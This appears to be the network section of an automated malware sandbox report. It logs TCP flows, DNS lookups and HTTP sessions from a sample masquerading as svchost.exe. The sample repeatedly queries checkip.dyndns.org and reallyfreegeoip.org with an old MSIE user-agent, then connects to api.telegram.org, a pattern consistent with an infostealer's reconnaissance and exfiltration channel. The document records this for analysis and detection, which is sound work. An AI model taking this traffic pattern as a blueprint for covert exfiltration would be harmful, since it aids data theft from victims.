                                                                                                              Jan 3, 2025 09:21:29.796439886 CET49853443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:29.796696901 CET49853443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:29.796711922 CET44349853188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:29.839036942 CET4984980192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:30.253139019 CET44349853188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:30.255621910 CET49853443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:30.255637884 CET44349853188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:30.401448965 CET44349853188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:30.401525974 CET44349853188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:30.401601076 CET49853443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:30.427973986 CET49853443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:30.447057962 CET4984980192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:30.448863029 CET4985880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:30.451987982 CET8049849132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:30.452038050 CET4984980192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:30.453721046 CET8049858132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:30.453821898 CET4985880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:30.454052925 CET4985880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:30.458801985 CET8049858132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:31.107666016 CET4973380192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:31.268237114 CET8049858132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:31.269573927 CET49862443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:31.269617081 CET44349862188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:31.269718885 CET49862443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:31.270035982 CET49862443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:31.270050049 CET44349862188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:31.313308954 CET4985880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:31.740175009 CET44349862188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:31.742116928 CET49862443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:31.742134094 CET44349862188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:31.879261017 CET44349862188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:31.879328012 CET44349862188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:31.879596949 CET49862443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:31.888448000 CET49862443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:31.892756939 CET4985880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:31.894062042 CET4986880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:31.897716999 CET8049858132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:31.897806883 CET4985880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:31.898844957 CET8049868132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:31.899014950 CET4986880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:31.899014950 CET4986880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:31.903866053 CET8049868132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:32.570352077 CET8049868132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:32.571746111 CET49874443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:32.571790934 CET44349874188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:32.571954966 CET49874443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:32.572343111 CET49874443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:32.572360039 CET44349874188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:32.625794888 CET4986880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:33.024094105 CET44349874188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:33.026702881 CET49874443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:33.026722908 CET44349874188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:33.174276114 CET44349874188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:33.174370050 CET44349874188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:33.174417973 CET49874443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:33.177912951 CET49874443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:33.189659119 CET4986880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:33.191303968 CET4987980192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:33.194652081 CET8049868132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:33.194705009 CET4986880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:33.196073055 CET8049879132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:33.196173906 CET4987980192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:33.196249008 CET4987980192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:33.200995922 CET8049879132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:33.866344929 CET8049879132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:33.867739916 CET49884443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:33.867803097 CET44349884188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:33.867873907 CET49884443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:33.868158102 CET49884443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:33.868182898 CET44349884188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:33.907077074 CET4987980192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:34.331299067 CET44349884188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:34.333838940 CET49884443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:34.333887100 CET44349884188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:34.476414919 CET44349884188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:34.476488113 CET44349884188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:34.476552010 CET49884443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:34.476950884 CET49884443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:34.480379105 CET4987980192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:34.481597900 CET4988880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:34.485321045 CET8049879132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:34.485438108 CET4987980192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:34.486424923 CET8049888132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:34.486489058 CET4988880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:34.486572027 CET4988880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:34.491322994 CET8049888132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:35.158082962 CET8049888132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:35.159554958 CET49893443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:35.159605980 CET44349893188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:35.159698963 CET49893443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:35.159955025 CET49893443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:35.159972906 CET44349893188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:35.203967094 CET4988880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:35.631548882 CET44349893188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:35.635684013 CET49893443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:35.635699987 CET44349893188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:35.783013105 CET44349893188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:35.783076048 CET44349893188.114.96.3192.168.2.7
                                                                                                              Jan 3, 2025 09:21:35.783211946 CET49893443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:35.787575960 CET49893443192.168.2.7188.114.96.3
                                                                                                              Jan 3, 2025 09:21:36.054650068 CET4988880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:36.055855989 CET49899443192.168.2.7149.154.167.220
                                                                                                              Jan 3, 2025 09:21:36.055906057 CET44349899149.154.167.220192.168.2.7
                                                                                                              Jan 3, 2025 09:21:36.055974007 CET49899443192.168.2.7149.154.167.220
                                                                                                              Jan 3, 2025 09:21:36.056662083 CET49899443192.168.2.7149.154.167.220
                                                                                                              Jan 3, 2025 09:21:36.056675911 CET44349899149.154.167.220192.168.2.7
                                                                                                              Jan 3, 2025 09:21:36.059647083 CET8049888132.226.247.73192.168.2.7
                                                                                                              Jan 3, 2025 09:21:36.059705973 CET4988880192.168.2.7132.226.247.73
                                                                                                              Jan 3, 2025 09:21:36.684699059 CET44349899149.154.167.220192.168.2.7
                                                                                                              Jan 3, 2025 09:21:36.684771061 CET49899443192.168.2.7149.154.167.220
                                                                                                              Jan 3, 2025 09:21:36.686285973 CET49899443192.168.2.7149.154.167.220
                                                                                                              Jan 3, 2025 09:21:36.686311007 CET44349899149.154.167.220192.168.2.7
                                                                                                              Jan 3, 2025 09:21:36.686538935 CET44349899149.154.167.220192.168.2.7
                                                                                                              Jan 3, 2025 09:21:36.687998056 CET49899443192.168.2.7149.154.167.220
                                                                                                              Jan 3, 2025 09:21:36.731337070 CET44349899149.154.167.220192.168.2.7
                                                                                                              Jan 3, 2025 09:21:36.930201054 CET44349899149.154.167.220192.168.2.7
                                                                                                              Jan 3, 2025 09:21:36.930275917 CET44349899149.154.167.220192.168.2.7
                                                                                                              Jan 3, 2025 09:21:36.930360079 CET49899443192.168.2.7149.154.167.220
                                                                                                              Jan 3, 2025 09:21:36.933093071 CET49899443192.168.2.7149.154.167.220
                                                                                                              Jan 3, 2025 09:21:42.711124897 CET4983880192.168.2.7132.226.247.73
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 3, 2025 09:21:11.273844957 CET6184253192.168.2.71.1.1.1
                                                                                                              Jan 3, 2025 09:21:11.281399012 CET53618421.1.1.1192.168.2.7
                                                                                                              Jan 3, 2025 09:21:12.511336088 CET5160553192.168.2.71.1.1.1
                                                                                                              Jan 3, 2025 09:21:12.518495083 CET53516051.1.1.1192.168.2.7
                                                                                                              Jan 3, 2025 09:21:24.106863022 CET5029953192.168.2.71.1.1.1
                                                                                                              Jan 3, 2025 09:21:24.114211082 CET53502991.1.1.1192.168.2.7
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Jan 3, 2025 09:21:11.273844957 CET192.168.2.71.1.1.10x5cceStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                              Jan 3, 2025 09:21:12.511336088 CET192.168.2.71.1.1.10x8242Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                              Jan 3, 2025 09:21:24.106863022 CET192.168.2.71.1.1.10x61edStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Jan 3, 2025 09:21:11.281399012 CET1.1.1.1192.168.2.70x5cceNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 3, 2025 09:21:11.281399012 CET1.1.1.1192.168.2.70x5cceNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                              Jan 3, 2025 09:21:11.281399012 CET1.1.1.1192.168.2.70x5cceNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                              Jan 3, 2025 09:21:11.281399012 CET1.1.1.1192.168.2.70x5cceNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                              Jan 3, 2025 09:21:11.281399012 CET1.1.1.1192.168.2.70x5cceNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                              Jan 3, 2025 09:21:11.281399012 CET1.1.1.1192.168.2.70x5cceNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                              Jan 3, 2025 09:21:12.518495083 CET1.1.1.1192.168.2.70x8242No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                              Jan 3, 2025 09:21:12.518495083 CET1.1.1.1192.168.2.70x8242No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                              Jan 3, 2025 09:21:24.114211082 CET1.1.1.1192.168.2.70x61edNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                              • reallyfreegeoip.org
                                                                                                              • api.telegram.org
                                                                                                              • checkip.dyndns.org
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.749710132.226.247.73807344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 3, 2025 09:21:11.298098087 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 3, 2025 09:21:11.990569115 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:11 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Jan 3, 2025 09:21:11.998090029 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 3, 2025 09:21:12.209918022 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:12 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Jan 3, 2025 09:21:13.964334011 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 3, 2025 09:21:14.175678015 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:14 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.749733132.226.247.73807344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 3, 2025 09:21:14.799432039 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 3, 2025 09:21:15.481419086 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:15 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.749740132.226.247.73807344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 3, 2025 09:21:16.109580994 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 3, 2025 09:21:16.779810905 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:16 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.749752132.226.247.73807344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 3, 2025 09:21:17.405138969 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 3, 2025 09:21:18.081995964 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:17 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.749764132.226.247.73807344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 3, 2025 09:21:18.704998016 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 3, 2025 09:21:19.386699915 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:19 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.749772132.226.247.73807344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 3, 2025 09:21:20.022284031 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 3, 2025 09:21:20.702958107 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:20 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.749783132.226.247.73807344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 3, 2025 09:21:21.314532042 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 3, 2025 09:21:21.996107101 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:21 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.749791132.226.247.73807344C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 3, 2025 09:21:22.658443928 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 3, 2025 09:21:23.355135918 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:23 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.749802132.226.247.73807588C:\Windows\SysWOW64\svchost.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 3, 2025 09:21:23.526798964 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 3, 2025 09:21:24.227577925 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 03 Jan 2025 08:21:24 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Jan 3, 2025 09:21:24.234503031 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
